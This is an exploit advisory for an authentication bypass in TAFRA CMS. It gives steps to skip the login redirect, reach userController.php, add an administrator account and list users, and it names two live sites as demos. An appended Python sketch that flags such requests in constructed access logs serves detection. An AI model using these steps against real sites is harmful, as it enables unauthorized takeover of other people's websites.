# Exploit Title: [TAFRA CMS "Add Admin"]
# Google Dork: [Use Your Brain !]
# Date: [3-5-2017]
# Exploit Author: [Mgm-Eg]
# Vendor Homepage: [http://www.sotmasr.com/tafra.php]
# Version: [1.X.X] & [2.X.X]
# Contact: [https://ask.fm/m1g1m]
# Contact2: [https://www.facebook.com/llmgm.egll]
---------------
- | POC | -
---------------
>>>Version [1.X.X]<<<
[Add Admin]
- Open http://site.com/admin/
- It will redirect you to http://site.com/admin/controllers/login.php
- Use NoRedirect & Add ^http://site.com/admin/controllers/login.php
- Open http://site.com/admin/controllers/userController.php
>>> Then Add Your Admin <<<
- To display users, open http://site.com/admin/controllers/userController.php?do=show
--------------------------------------------------------------------------------------
Demo
[http://www.elkhabareg.com/]
[http://news.sotmasr.com/v1/]
-------------------------------
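
Detection sketch for the Version 1.X.X steps above, added here as an example and not part of the original advisory or of TAFRA's code: it flags access-log entries where an admin controller other than login.php answered with a redirect yet still sent a page-sized body, which is what a login check that redirects without stopping the script looks like in the log. It assumes the redirect is an HTTP 3xx and the log is in "combined" format; the 512-byte threshold and all sample lines are constructed.

```python
import re

# Constructed sample lines in Apache/nginx "combined" format (not from a real server).
SAMPLE_LOG = """\
203.0.113.7 - - [03/May/2017:10:01:02 +0000] "GET /admin/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [03/May/2017:10:01:03 +0000] "GET /admin/controllers/login.php HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
203.0.113.7 - - [03/May/2017:10:01:40 +0000] "GET /admin/controllers/userController.php HTTP/1.1" 302 6120 "-" "Mozilla/5.0"
203.0.113.7 - - [03/May/2017:10:02:11 +0000] "POST /admin/controllers/userController.php HTTP/1.1" 302 6342 "-" "Mozilla/5.0"
203.0.113.7 - - [03/May/2017:10:02:30 +0000] "GET /admin/controllers/userController.php?do=show HTTP/1.1" 302 9051 "-" "Mozilla/5.0"
198.51.100.20 - - [03/May/2017:11:00:00 +0000] "GET /admin/controllers/userController.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
""".splitlines()

# client IP, request line, status and response body size of a combined-format entry
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
# Scripts under the admin controller directory named in the advisory
CONTROLLER_RE = re.compile(r'^/admin/controllers/(?P<script>[^/?]+\.php)')
REDIRECTS = {"301", "302", "303", "307", "308"}


def find_leaky_redirects(lines, min_body=512):
    """Return (ip, method, target, size) for admin controller requests that were
    redirected but still carried a body of at least min_body bytes.
    A redirect sent by a script that then exits has an empty or tiny body."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["status"] not in REDIRECTS:
            continue
        c = CONTROLLER_RE.match(m["target"])
        if not c or c["script"] == "login.php":
            continue  # the login page itself is expected to be public
        size = 0 if m["size"] == "-" else int(m["size"])
        if size >= min_body:
            hits.append((m["ip"], m["method"], m["target"], size))
    return hits


if __name__ == "__main__":
    for ip, method, target, size in find_leaky_redirects(SAMPLE_LOG):
        print(f"{ip} {method} {target} redirected with {size}-byte body")
```

A POST among the hits means a state-changing request reached the controller without a session, so the user table should be reviewed for accounts created around that timestamp.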